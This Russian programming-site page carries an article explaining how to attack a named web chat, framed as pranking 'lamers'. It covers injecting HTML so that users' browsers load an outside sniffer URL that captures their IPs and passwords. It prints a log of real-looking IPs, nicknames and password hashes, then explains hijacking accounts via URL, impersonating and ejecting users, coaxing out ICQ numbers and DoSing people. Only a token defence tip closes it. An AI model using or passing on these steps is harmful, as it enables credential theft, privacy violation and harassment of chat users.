Навигация
Главная
Поиск
Форум
FAQ's
Ссылки
Карта сайта
Чат программистов

Статьи
-Delphi
-C/C++
-Turbo Pascal
-Assembler
-Java/JS
-PHP
-Perl
-DHTML
-Prolog
-GPSS
-Сайтостроительство
-CMS: PHP Fusion
-Инвестирование

Файлы
-Для программистов
-Компонеты для Delphi
-Исходники на Delphi
-Исходники на C/C++
-Книги по Delphi
-Книги по С/С++
-Книги по JAVA/JS
-Книги по Basic/VB/.NET
-Книги по PHP/MySQL
-Книги по Assembler
-PHP Fusion MOD'ы
-by Kest
Professional Download System
Реклама
Услуги

Автоматическое добавление статей на сайты на Wordpress, Joomla, DLE
Заказать продвижение сайта
Программа для рисования блок-схем
Инженерный калькулятор онлайн
Таблица сложения онлайн
Популярные статьи
OpenGL и Delphi... 65535
Форум на вашем ... 65535
HACK F.A.Q 65535
Бип из системно... 65535
Гостевая книга ... 65535
Invision Power ... 65535
Содержание сайт... 65535
Вызов хранимых ... 65535
Программируемая... 65535
Эмулятор микроп... 65535
Подключение Mic... 65535
Приложение «Про... 65535
Оператор выбора... 65535
Организация зап... 64683
Создание потоко... 62664
Модуль Forms 61267
Создание отчето... 61239
ТЕХНОЛОГИИ ДОСТ... 57704
Пример работы с... 55212
Имитационное мо... 53097
Реклама
Сейчас на сайте
Гостей: 11
На сайте нет зарегистрированных пользователей

Пользователей: 13,067
новичок: senata7
Новости
Реклама
Выполняем курсовые и лабораторные по разным языкам программирования
Подробнее - курсовые и лабораторные на заказ
Delphi, Turbo Pascal, Assembler, C, C++, C#, Visual Basic, Java, GPSS, Prolog, 3D MAX, Компас 3D
Заказать программу для Windows Mobile, Symbian

Программа тестирования и обучающая программа по математике на Turbo Pasc...
Обратное размещение элементов ЭВС на Delphi + Пояснительная записка
Моделирование процесса поступления заявок в систему, состоящую из трёх Э...

Реклама



Подписывайся на YouTube канал о программировании, что бы не пропустить новые видео!

ПОДПИСЫВАЙСЯ на канал о программировании
Дырки в безопасности чатов
Ты, конечно же, в курсе, что многие чаты на www далеки от совершенства. Нет, ну конечно, у них там есть всякие фенечки, всякие картиночки, рисуночки и прочая фигня, но вот защита там частенько просто отсутствует. Таких чатов полно, поэтому мы решили взять первый попавшийся из них и описать способы взлома. Системным администраторам этого чата Х советует еще раз проверить, что они там наконфигурили, и заткнуть все описываемые ниже дырки. Чат находится по адресу www.chat.orc.ru.
Будь готов - всегда готов
Когда нефига делать, то можно залезть и поприкалываться в html-чатах. Там, как правило, сидят ламеры и уроды, а также люди, которые только зашли в Инет. Прикалываться можно по разному: вставляя нецензурную брань, неприличные картинки, java-скрипты и прочие пакости. Чат "Початок" представляет стандартный, но немного переделанный свободно распространяемый чат "Chat Machine". В нем, якобы, запрещено вставлять html-теги, но мы это исправим. Размер и цвет шрифтов, которые определил админ, мы тоже исправим, как и скрытие IP других юзеров.
Как менять установки шрифта
Сохраняем то окно, где находятся установки (цвет, размер), открываем текстовым редактором и ищем следующую строчку Красный. Вместо слова Red можно подставить любое название цвета, ведь по умолчанию можно выбирать только цвета, установленные админом. :)
Находим поле Большой. Разве "+2" это большой шрифт? :) Нет, так дело не пойдет, пишем "+5".
Как вставлять теги
Находим стоку Красный. Берем и изменяем его следующим образом: Красный. Не закрываем тэг (потому что он и так закроется) и после название цвета закрываем тэг. Пишем любое сообщение, и тем самым получается, что чатлане видят не совсем пристойную картинку. :)
Таким образом можно ставить любой тэг типа Красный, и чат начинает "летать" :).
Как войти в чат под другим зарегистрированным пользователем и узнать их IP адреса
Находим строчку Красный и, используя всем известный синффер html чатов, получаем IP участников чата и их пароли. Делается это следующим образом: http://www.hackzone.ru/cgi-bin/sniff.cgi?satan">Красный. Далее пишем какое-либо сообщение, видим картинку HackZone и смотрим лог по адресу http://www.hackzone.ru/files/snifflog.txt. В нем мы видим следующее:
[Tue 3:03pm] (id) 195.210.130.46 d046.p1.col.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=YURIK&passwd=31ZUlukFqoI5c&custom1=on]
[Tue 3:03pm] (id) 212.15.128.4 dobbin.eurocom.od.ua 212.15.128.42 [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=afrodita&passwd=480/SYC8r5W3U&custom1=on]
[Tue 3:03pm] (id) 129.132.26.41 ilea1.ethz.ch [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=Monach&passwd=49aiRPRMobjZ6&custom1=on]
[Tue 3:03pm] (id) 195.2.78.163 p163.n78.dip.aha.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=Patron25&passwd=13ttx6i7zWwkk&custom1=on]
[Tue 3:03pm] (id) 199.203.4.5 customer.netvision.net.il 207.232.23.220,194.90.119.123 [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=_RENAT__&passwd=315ybDkg5YM22&custom1=on]
[Tue 3:03pm] (id) 193.232.119.130 ns.misa.ac.ru 192.168.12.133 [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=Dasha&passwd=27tQONxBHE612&custom1=on]
[Tue 3:03pm] (id) 195.210.130.46 d046.p1.col.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=YURIK&passwd=31ZUlukFqoI5c&custom1=on]
[Tue 3:03pm] (id) 195.91.140.77 ppp666.nigger.is.satan.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=Satan&passwd=40xtEwTiIfRQI&custom1=on]
[Tue 3:03pm] (id) 195.2.78.163 p163.n78.dip.aha.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=Patron25&passwd=13ttx6i7zWwkk&custom1=on]
[Tue 3:02pm] (id) 195.34.28.213 dialup-28213.dialup.ptt.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=_GUN_&passwd=13/hfDaaKZEeg&custom1=on]
Вот они все на ладони :).
Если надо, запингуем кого-нибудь со всех шеллов, а особых уродов заДоСим чем-нибудь типа kod.c или pimp.c.
Как хакеры втираются в доверие
Теперь можно зайти под любым пользователем, который находится в чате, не зная его пароль. Выбираем, например, доброго GUN'a, который уже 2 года в этом чате сидит и которому все доверяют. :) Копируем его строку и вставляем в браузер: http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=_GUN_&passwd=13/hfDaaKZEeg&custom1=on.
Вуаля! Мы зашли под ним в чат, и теперь, сославшись на потерю памяти, можно выведать у всех пользователей ICQ номера, дать чего надо и наслаждаться жизнью. :)
Не забудь, что после каждого изменения твоего файла с установками его нужно сохранять и нажимать кнопку применить.
Исходник снифера можно взять по адресу http://www.hackzone.ru/files/sniff.txt и изменить, чтобы не показывалась картинка, а то особо мудрые совы могут что-то заподозрить.
Очень много людей знают про хакзоновский сниффер, так что можно воспользоваться нашим: http://phorce.virtualave.net/cgi-bin/sniffer.cgi, лог-файл: http://phorce.virtualave.net/cgi-bin/fuck.log.
Как говорить от других имен
Узнав шифрованный пароль того кого нужно с помощью сниффера, сохраняем то окно, где нужно писать текст, и вставляем вместо своего ника чужой (и пароль, конечно), и пишем чего душе угодно!
Как выкидывать из чата
Опять же, получив шифрованный пароль в документе с настройками, сохраненном на нашем диске, в самом низу вставляем вместо своего ника и пароля - чужие. Сохраняем, открываем, жмем выход, затем видим сообщение, что Вася Пупкин покинул чат. :)
Как защититься от сниффера
Это очень просто. Залезаем в установки броузера и вырубаем показ картинок.
Опубликовал Kest October 26 2008 16:27:23 · 1 Комментариев · 6734 Прочтений · Для печати

• Не нашли ответ на свой вопрос? Тогда задайте вопрос в комментариях или на форуме! •


Комментарии
ibragim December 24 2011 07:42:28
airwayfun.com
Добавить комментарий
Имя:



smiley smiley smiley smiley smiley smiley smiley smiley smiley
Запретить смайлики в комментариях

Введите проверочный код:* =
Рейтинги
Рейтинг доступен только для пользователей.

Пожалуйста, залогиньтесь или зарегистрируйтесь для голосования.

Нет данных для оценки.
Гость
Имя

Пароль



Вы не зарегистрированны?
Нажмите здесь для регистрации.

Забыли пароль?
Запросите новый здесь.
Поделиться ссылкой
Фолловь меня в Твиттере! • Смотрите канал о путешествияхКак приготовить мидии в тайланде?
Загрузки
Новые загрузки
iChat v.7.0 Final...
iComm v.6.1 - выв...
Visual Studio 200...
CodeGear RAD Stud...
Шаблон для новост...

Случайные загрузки
PBFoldder
Язык программиров...
Midi
FatScrollbar
Encrypt Decrypt
Последние загруж...
Учебник по создан...
Run
Модифицированная ...
MiniChat
VksButton
Профессиональное ...
Программа предназ...
Delphi 7 Enterpri...
Delphi Russian Kn...
Игра Car [Исходни...
DS_Group
DeleteEdit
isoCanvas (Редакт...
Разработка интерн...

Топ загрузок
Приложение Клие... 100386
Delphi 7 Enterp... 83602
Converter AMR<-... 20051
GPSS World Stud... 11328
Borland C++Buil... 11247
Borland Delphi ... 8186
Turbo Pascal fo... 6989
Visual Studio 2... 4970
Калькулятор [Ис... 4421
FreeSMS v1.3.1 3516
Случайные статьи
Меню фотоаппарата ...
1.3.2. Создание об...
Как получить домен...
Ограничение ущерба
Решение задачи, ис...
Этап 5 - использов...
Электропитание або...
Поля структур
Реализация классиф...
Интерфейс TPI
Графические данные...
Системные включаем...
Бесконечная систем...
Критические ошибки
Задание индексов в...
Как сделать Outloo...
Библиотека Matrix
Что делает команда...
• На какой уровень...
Справка панели инф...
Протокол MNP
Элементы applet и ...
Обработка сигналов...
Протокол передачи ...
Прочие «примочки»:...
Статистика



Друзья сайта
Программы, игры


Полезно
В какую объединенную сеть входит классовая сеть? Суммирование маршрутов Занимают ли таблицы память маршрутизатора?